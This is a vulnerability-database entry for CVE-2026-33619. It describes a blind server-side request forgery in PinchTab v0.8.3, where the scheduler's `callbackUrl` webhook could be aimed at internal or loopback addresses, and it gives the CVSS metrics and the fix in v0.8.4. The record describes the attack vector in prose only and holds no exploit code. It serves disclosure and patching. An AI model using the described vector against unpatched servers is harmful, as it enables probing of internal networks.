dispatch, rejecting non-public IP ranges, pinning delivery to validated IPs, disabling redirect following, and validating `callbackUrl` during task submission.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab v0.8.3 contains a server-side request forgery issue in the optional scheduler\u0027s webhook delivery path. When a task is submitted to `POST /tasks` with a user-controlled `callbackUrl`, the v0.8.3 scheduler sends an outbound HTTP `POST` to that URL when the task reaches a terminal state. In that release, the webhook path validated only the URL scheme and did not reject loopback, private, link-local, or other non-public destinations. Because the v0.8.3 implementation also used the default HTTP client behavior, redirects were followed and the destination was not pinned to validated IPs. This allowed blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets reachable from the server. This issue is narrower than a general unauthenticated internet-facing SSRF. The scheduler is optional and off by default, and in token-protected deployments the attacker must already be able to submit tasks using the server\u0027s master API token. In PinchTab\u0027s intended deployment model, that token represents administrative control rather than a low-privilege role. Tokenless deployments lower the barrier further, but that is a separate insecure configuration state rather than impact created by the webhook bug itself. PinchTab\u0027s default deployment model is local-first and user-controlled, with loopback bind and token-based access in the recommended setup. That lowers practical risk in default use, even though it does not remove the underlying webhook issue when the scheduler is enabled and reachable. This was addressed in v0.8.4 by validating callback targets before dispatch, rejecting non-public IP ranges, pinning delivery to validated IPs, disabling redirect following, and validating `callbackUrl` during task submission."
},
{
"lang": "es",
"value": "PinchTab es un servidor HTTP aut\u00f3nomo que otorga a los agentes de IA control directo sobre un navegador Chrome. PinchTab v0.8.3 contiene un problema de falsificaci\u00f3n de petici\u00f3n del lado del servidor en la ruta de entrega de webhook del programador opcional. Cuando se env\u00eda una tarea a \u0027POST /tasks\u0027 con una \u0027callbackUrl\u0027 controlada por el usuario, el programador v0.8.3 env\u00eda un \u0027POST\u0027 HTTP saliente a esa URL cuando la tarea alcanza un estado terminal. En esa versi\u00f3n, la ruta del webhook validaba solo el esquema de la URL y no rechazaba destinos de bucle invertido, privados, de enlace local u otros no p\u00fablicos. Debido a que la implementaci\u00f3n v0.8.3 tambi\u00e9n utilizaba el comportamiento predeterminado del cliente HTTP, se segu\u00edan las redirecciones y el destino no estaba fijado a IPs validadas. Esto permit\u00eda SSRF ciego desde el servidor PinchTab a objetivos HTTP(S) elegidos por el atacante accesibles desde el servidor. Este problema es m\u00e1s limitado que un SSRF general no autenticado y expuesto a internet. El programador es opcional y est\u00e1 desactivado por defecto, y en implementaciones protegidas por token el atacante ya debe ser capaz de enviar tareas utilizando el token maestro de la API del servidor. En el modelo de implementaci\u00f3n previsto de PinchTab, ese token representa control administrativo en lugar de un rol de bajo privilegio. Las implementaciones sin token reducen a\u00fan m\u00e1s la barrera, pero eso es un estado de configuraci\u00f3n inseguro separado en lugar del impacto creado por el propio error del webhook. El modelo de implementaci\u00f3n predeterminado de PinchTab es local-first y controlado por el usuario, con enlace de bucle invertido y acceso basado en token en la configuraci\u00f3n recomendada. Eso reduce el riesgo pr\u00e1ctico en el uso predeterminado, aunque no elimina el problema subyacente del webhook cuando el programador est\u00e1 habilitado y es accesible. Esto se abord\u00f3 en la v0.8.4 validando los objetivos de callback antes del env\u00edo, rechazando rangos de IP no p\u00fablicos, fijando la entrega a IPs validadas, deshabilitando el seguimiento de redirecciones y validando \u0027callbackUrl\u0027 durante el env\u00edo de tareas."
}
],
"id": "CVE-2026-33619",
"lastModified": "2026-03-30T13:26:50.827",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-26T21:17:06.220",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/pinchtab/pinchtab/commit/c824574c3a05073dec2f5e9c219e22ffff8de445"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-xqq2-4j46-vwp7"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…